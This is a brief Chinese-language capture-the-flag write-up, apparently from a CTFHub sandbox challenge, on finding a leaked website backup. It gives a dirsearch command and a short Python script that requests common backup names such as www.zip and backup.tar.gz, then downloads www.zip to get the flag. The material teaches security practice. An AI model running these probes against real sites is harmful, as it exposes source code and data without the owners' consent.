1.题目
2.打开wp提示
3.使用dirsearch进行扫描(这个方法未成功,安装了dirsearch后发现貌似是python环境的问题)
python3 dirsearch.py -u http://challenge-4267b351d554247a.sandbox.ctfhub.com:10800/ -e *
或者写个python脚本
import requests url = "http://challenge-4267b351d554247a.sandbox.ctfhub.com:10800/" li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] li2 = ['tar', 'tar.gz', 'zip', 'rar'] for i in li1: for j in li2: url_final = url + "/" + i + "." + j r = requests.get(url_final) print(r)
运行成果:
访问/www.zip返回状态码200,于是在URL后面加上/www.zip,弹出zip压缩包下载
4.访问该路径,获取flag
- 海报